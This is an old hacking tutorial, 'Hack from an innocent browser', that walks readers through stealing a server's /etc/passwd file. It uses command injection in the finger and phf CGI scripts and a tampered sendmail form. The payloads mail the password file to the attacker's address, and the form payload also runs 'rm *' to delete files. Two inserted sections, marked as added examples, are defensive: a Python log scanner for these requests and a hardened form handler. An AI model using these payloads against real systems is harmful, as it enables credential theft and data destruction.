
            Hack from an innocent browser - by wilhelm
                translated to english by woody^drn

I'll write how to get the famous .passwd file directly from your browser.
Many people think of a browser as harmless, but actually the browser
(yeah, just laugh) is one of Windows' most dangerous weapons.

Let's take a simple security program like WinU, where you can set what
the different users have access to. But if the user has access to
a browser, you can save yourself the time it takes to install WinU. Everybody
knows the little trick "file://c:\" in the address box, and can see the
root of c:.

Well, let's get to the good stuff ...

There are many ways to get the passwd file. I'll describe 3 ways to get
it, using "phf" and "finger" as the security hole.

We need to find a domain that runs the program "phf" .. this ain't my job,
so I'll just write some random URLs ...

1.  Hack with "finger" - ("finger" doesn't have to be on the client
    machine!!)

Let's say we're getting the .passwd file from http://www.forum.dk; let's
check if they've got "finger" installed.

http://www.forum.dk/cgi-bin/finger <- the file is always in the cgi
directory, but the cgi dir can vary from server to server.

If "finger" is active, it displays a box where you can write the
username you're searching for. If this is the case you've got a BIG
chance of getting the .passwd file. Now you need a username; you can
get one by looking through some emails like karl@forum.dk, where the
username is karl. Now type in the "finger" box:

karl@forum.dk ; /bin/mail your@email.com < etc/passwd

You will now be sent a mail from the user (karl) with the .passwd
file attached, ready to be cracked. Nice, huh? :)

2.  Hack with "phf" - ("phf" doesn't have to be on the client machine!!)

You can actually run every single UN!X command directly through the
browser. So if you have just a little experience with un!x, you can
guess what to write:

http://www.forum.dk/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.

This smart command will show the .passwd file directly in the browser
window, ready to be copied, pasted and cracked...
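Both tricks above (and the form trick in section 3) leave the same trace on the server side: a request to a /cgi-bin/ script whose query string carries shell metacharacters or a sensitive path such as /etc/passwd. The following is an added example, not part of the original text, of how an administrator could pick those requests out of a Common Log Format access log. The log lines, hosts and timestamps are constructed for the example and modelled on the requests described above; it generalizes to any /cgi-bin/ script, not only phf and finger.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Common Log Format). Hosts, timestamps
# and request lines are made up for this example, modelled on the requests
# the text describes; they are not real log data.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1998:10:15:01 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1532
10.0.0.7 - - [12/Mar/1998:10:16:44 +0100] "GET /cgi-bin/finger?karl%40forum.dk+%3B+/bin/mail+me%40example.com+%3C+/etc/passwd HTTP/1.0" 200 211
10.0.0.9 - - [12/Mar/1998:10:17:02 +0100] "GET /index.html HTTP/1.0" 200 4021
10.0.0.9 - - [12/Mar/1998:10:17:09 +0100] "GET /cgi-bin/finger?karl HTTP/1.0" 200 180
10.0.0.11 - - [12/Mar/1998:10:18:30 +0100] "GET /cgi-bin/sendmail.pl?e-mail=%3B+rm+*+%3B+mail+-s+file+x%40example.com+%3C+/etc/passwd%3B&input=hi HTTP/1.0" 200 96
"""

# Minimal CLF parser: host, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Shell metacharacters that have no business in a CGI parameter once it is
# URL-decoded. '\n' and '\r' cover the %0a trick used against phf.
SHELL_META = re.compile(r'[;|&`<>\n\r]|\$\(')
# Paths that a legitimate finger/phf/mail query never needs to mention.
SENSITIVE = re.compile(r'/etc/passwd|/etc/shadow|/bin/')


def inspect_request(target):
    """Return a reason string if the decoded request looks like CGI command
    injection, else None. Only /cgi-bin/ targets are examined."""
    parts = urlsplit(target)
    if not parts.path.startswith("/cgi-bin/"):
        return None
    # parse_qsl splits on '&' and URL-decodes each name and value, so a
    # literal '&' that survives decoding really was inside a parameter.
    # keep_blank_values=True keeps a bare "karl" (no '=') as a name.
    decoded = " ".join(
        f"{name} {value}"
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    )
    reasons = []
    if SHELL_META.search(decoded):
        reasons.append("shell metacharacter in query")
    if SENSITIVE.search(decoded):
        reasons.append("sensitive path in query")
    return "; ".join(reasons) or None


def scan_log(text):
    """Parse CLF lines and return (host, script path, reason) for each hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        reason = inspect_request(m.group("target"))
        if reason:
            hits.append((m.group("host"), urlsplit(m.group("target")).path, reason))
    return hits


if __name__ == "__main__":
    for host, path, reason in scan_log(SAMPLE_LOG):
        print(f"{host} {path}: {reason}")
```

The benign finger lookup for "karl" and the plain page fetch are not reported; the three injection attempts are. Because the check runs on the decoded parameters rather than the raw request line, encoding the payload (%3B for ';', %0a for a newline) does not hide it.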

3.  Hack with sendmail etc.

Let's say we saw a site with the following form:

<form action = "http://www.forum.dk/cgi-bin/sendmail.pl" method="get">
  <input type="hidden" name="e-mail" value="support@forum.dk">
  <input type="text" name="input">
  <input type="submit" value="send">
</form>

This is easy to tamper with :), just make the following page:

<html>
<head>
  <title>CGI-Hack</title>
</head>
<body>
  <form action = "http://www.forum.dk/cgi-bin/sendmail.pl" method="get">
    <input type="hidden" name="e-mail" value=" ; rm * ;mail -s file
     your@email.dk < /etc/passwd;">
    <input type="text" name="input">
    <input type="submit" value="Go Get IT!">
  </form>
</body>
</html>

If you're confused: the semicolons are used to separate un!x commands.
All the form does is send a command to the Perl program, and Perl
will send the .passwd file to your email :o)
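The weakness the form trick relies on is that the script trusts the hidden "e-mail" field and hands it to a shell. A hidden field is still client-controlled: anyone can save the page, change the value and resubmit it. What follows is an added example, not the original sendmail.pl (which the text does not show), of how such a form handler could be written so the payload above never reaches a shell: the recipient is syntax-checked, then matched against a server-side allowlist, and mail is sent by invoking sendmail with an argument list rather than a command string. The allowlist entry support@forum.dk is the address from the form in the text; /usr/sbin/sendmail and the injectable `runner` parameter are assumptions made for this example.

```python
import re
import subprocess

# Server-side policy: the recipient is chosen from a fixed allowlist, never
# taken verbatim from the form. The address is the one shown in the text's
# form; in a real deployment it would be a site-specific constant.
ALLOWED_RECIPIENTS = {"support@forum.dk"}

# Syntax check applied before the allowlist lookup. It admits only the
# characters a plain mailbox address needs, so ';', '<', '|', '*', spaces
# and newlines all fail here.
EMAIL_RE = re.compile(r'^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,190}\.[A-Za-z]{2,}$')


class RejectedInput(ValueError):
    """Raised when a form field fails validation."""


def validate_recipient(value):
    """Return the recipient only if it is syntactically an address AND on
    the allowlist. The exact-match allowlist also rules out a value that
    starts with '-', which sendmail would otherwise read as an option."""
    if not EMAIL_RE.fullmatch(value):
        raise RejectedInput("recipient is not a plain mailbox address")
    if value not in ALLOWED_RECIPIENTS:
        raise RejectedInput("recipient is not an allowed destination")
    return value


def build_mail_command(recipient):
    """argv for sendmail (path assumed for this example). The address is a
    single argument and no shell is involved, so metacharacters are inert.
    '-oi' stops a line containing only '.' from ending the message early."""
    return ["/usr/sbin/sendmail", "-oi", validate_recipient(recipient)]


def send_form_mail(form, runner=subprocess.run):
    """Handle one submission: validate, build argv, feed the body on stdin.
    `runner` is injectable so a test can capture argv instead of sending."""
    recipient = form.get("e-mail", "")
    body = form.get("input", "")
    argv = build_mail_command(recipient)  # raises RejectedInput on bad input
    # Subject is fixed and the body sits after the blank line, so user text
    # cannot add headers of its own.
    message = f"To: {recipient}\nSubject: web form\n\n{body}\n"
    return runner(argv, input=message.encode(), check=True)


if __name__ == "__main__":
    for candidate in ["support@forum.dk", " ; rm * ;mail -s file your@email.dk < /etc/passwd;"]:
        try:
            print("accepted:", build_mail_command(candidate))
        except RejectedInput as exc:
            print("rejected:", repr(candidate), "->", exc)
```

The two layers are deliberate: the regex gives a clear error for garbage, and the allowlist means that even a well-formed address cannot turn the script into an open relay. Using an argument list is what makes the semicolons harmless; with `shell=True` or a Perl backtick/`system("...")` string the same payload would run.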

That's all folks!

(.) (.)
 ) . (
(  Y  ) ...ups

-wilhelm^drn

